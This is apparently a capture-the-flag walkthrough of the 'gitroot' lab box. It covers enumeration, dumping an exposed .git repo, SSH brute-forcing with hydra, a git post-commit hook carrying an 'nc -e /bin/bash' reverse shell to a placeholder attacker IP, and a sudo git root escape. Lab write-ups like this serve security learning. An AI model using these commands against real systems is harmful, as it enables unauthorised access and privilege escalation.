Git all the ways to the root!
We will learn about Git and how we should secure our Git to avoid escalating privileges :)
Enumeration
Let’s do nmap first and see what do we get.
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.38
11211/tcp open memcache? syn-ack ttl 64Port 80
We found a possible user Jen and a domain wp.gitroot.vuln and let’s enumerate more if there is another domain that can be found! We can use Gobuster for this. Please add the domain in /etc/hosts
gobuster vhost -u http://gitroot.vuln -w <wordlist>
wp.gitroot.vuln
Let’s use wpscan since there is a WordPress inside here. We found another possible user beth and there is nothing more inside there
wpscan --url http://wp.gitroot.vuln -e u
repo.gitroot.vuln
There is get.php use for getting a file and set.php to send a file. But both of these I have tried and nothing is working.
Then what I can think of is to check if there is a .git folder inside here and we found it! So let’s use Git Dumper.
python3 git-dumper.py http://repo.gitroot.vuln .
So a lot of files inside here but nothing is working except we found another possible user which is pablo. You can find a lot of stuff using git commands please check on my references :)
First User (Pablo)
I have tried all of the passwords but none of them are working. So let’s use hydra with rockyou.txt (Please custom it)
hydra -l pablo -P password.txt -f <ip> ssh
We found it!
Second User (Beth)
We found a message that tells us to check the new brand git repo. So lets check for .git directory using find.
find / -name .git 2>/dev/null
We will take a look at /opt/auth/.git. Inside that directory, we found that there is a lot of branch using git branch. So we can look at the log and see if there is something important for us. Since there are a lot of repeating words I use this command inside the log directory.
strings HEAD | grep -v 'init repo' | grep -v 'moving from'
We found out that the right side is the commit unique id or hash. We can take a look inside it using the hash.
git show 06fbefc1da56b8d552cfa299924097ba1213dd93
Since this .git directory is own by beth we can assume that the password is beth’s password so let’s move on!
Third User (Jen)
I have tried to put a txt file inside Jen repos and try to read it and its work. From here let’s take a look at GTFOBins and we found something interesting that we can use.
Thanks to my friend @chr4m aka Aniq Fakhrul found that we can use post-commit instead of pre-commit to get our shell!
#Create git init in tmp directory
git init#Create a post-commit (chmod 777 incase)
echo 'nc -e /bin/bash <ip> <port>' > '/tmp/.git/hooks/post-commit'#Zip our .git directory
7z a shell.zip .git#Copy our zip file to Jen Repos where it will unzip and put in the public
cp shell.zip /home/jen/public/repos/shell.zip
Root
The first thing I do after got Jen user to check the directory. I found a suspicious word inside .viminfo.
I tried to use it on root but it's not getting anywhere but after a lot of trying it actually is the Jen password haha. After that we can use sudo -l to check what command this user can use.
Yess! We can use GTFOBins for this one and it's very simple :)
sudo git help config#Enter this
!/bin/sh
This box sure is interesting. Learn a lot about git commands and there are many more to learn. Thanks to my friend @ch4rm aka Aniq Fakhrul and please check on his website in the references!
If there is any suggestion please tell me or if there is something that I can improve also please do tell me. Hope this writeup help anyone and let’s learn together :)
